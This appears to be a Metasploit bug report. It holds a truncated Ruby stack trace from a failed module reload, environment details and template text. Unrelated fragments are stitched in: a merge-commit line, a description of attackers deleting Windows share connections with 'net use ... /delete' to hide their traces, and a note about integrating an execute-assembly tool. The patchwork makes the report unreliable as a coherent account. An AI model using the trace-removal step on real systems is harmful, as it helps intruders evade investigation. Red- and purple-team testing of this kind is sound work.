/usr/src/metasploit-framework/lib/msf/core/module/platform.rb:61:in find_platform' /usr/src/metasploit-framework/lib/msf/core/module/platform_list.rb:55:in block in initialize'
/usr/src/metasploit-framework/lib/msf/core/module/platform_list.rb:53:in each' /usr/src/metasploit-framework/lib/msf/core/module/platform_list.rb:53:in initialize'
/usr/src/metasploit-framework/lib/msf/core/module/platform_list.rb:40:in new' /usr/src/metasploit-framework/lib/msf/core/module/platform_list.rb:40:in from_a'
/usr/src/metasploit-framework/lib/msf/core/module/platform_list.rb:30:in transform' /usr/src/metasploit-framework/lib/msf/core/module.rb:119:in initialize'
/usr/src/metasploit-framework/lib/msf/core/module/has_actions.rb:6:in initialize' /usr/src/metasploit-framework/lib/msf/core/post_mixin.rb:16:in initialize'
/usr/src/metasploit-framework/modules/post/multi/purple/t1153.rb:9:in initialize' /usr/src/metasploit-framework/lib/msf/core/module_set.rb:54:in new'
/usr/src/metasploit-framework/lib/msf/core/module_set.rb:54:in create' /usr/src/metasploit-framework/lib/msf/core/modules/metadata/cache.rb:61:in block (3 levels) in refresh_metadata'
/usr/src/metasploit-framework/lib/msf/core/modules/metadata/cache.rb:57:in each' /usr/src/metasploit-framework/lib/msf/core/modules/metadata/cache.rb:57:in block (2 levels) in refresh_metadata'
/usr/src/metasploit-framework/lib/msf/core/modules/metadata/cache.rb:54:in each' /usr/src/metasploit-framework/lib/msf/core/modules/metadata/cache.rb:54:in block in refresh_metadata'
/usr/src/metasploit-framework/lib/msf/core/modules/metadata/cache.rb:51:in synchronize' /usr/src/metasploit-framework/lib/msf/core/modules/metadata/cache.rb:51:in refresh_metadata'
/usr/src/metasploit-framework/lib/msf/core/module_manager/cache.rb:124:in refresh_cache_from_module_files' /usr/src/metasploit-framework/lib/msf/core/module_manager/reloading.rb:51:in reload_modules'
/usr/src/metasploit-framework/lib/msf/ui/console/command_dispatcher/modules.rb:859:in cmd_reload_all' /usr/src/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:523:in run_command'
/usr/src/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:474:in block in run_single' /usr/src/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in each'
/usr/src/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in run_single' /usr/src/metasploit-framework/lib/rex/ui/text/resource.rb:57:in load_resource'
/usr/src/metasploit-framework/lib/rex/ui/text/resource.rb:61:in eval' /usr/src/metasploit-framework/lib/rex/ui/text/resource.rb:61:in load_resource'
/usr/src/metasploit-framework/lib/msf/ui/console/driver.rb:183:in block in initialize' /usr/src/metasploit-framework/lib/msf/ui/console/driver.rb:182:in each'
/usr/src/metasploit-framework/lib/msf/ui/console/driver.rb:182:in initialize' /usr/src/metasploit-framework/lib/metasploit/framework/command/console.rb:62:in new'
/usr/src/metasploit-framework/lib/metasploit/framework/command/console.rb:62:in driver' /usr/src/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in start'
/usr/src/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in start' ./msfconsole:49:in

Expected behavior

Postgres db should connect seamless.
reload_all should work without any errors.

Current behavior

Postgres db is not connected.
reload_all is not working.

System stuff

Metasploit version

Framework: 5.0.69-dev-5e07f93720
Console : 5.0.69-dev-5e07f93720

Get this with the version command in msfconsole (or git log -1 --pretty=oneline for a source install).

I installed Metasploit with:

• Kali package via apt
• Omnibus installer (nightly)
• Commercial/Community installer (from http://www.rapid7.com/products/metasploit/download.jsp)
• [xi ] Source install (please specify ruby version)

Merge pull request #51 from praetorian-code/tmsteen-create/T1153M

OS

What OS are you running Metasploit on?
Ubuntu 18.04 LTS

Description

Windows shared drive and Windows Admin Shares connections can be removed when no longer needed. Net is an example utility that can be used to remove network share connections with the net use \system\share /delete command. [1]

Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.

Test and integrate https://github.com/b4rtik/metasploit-execute-assembly into the project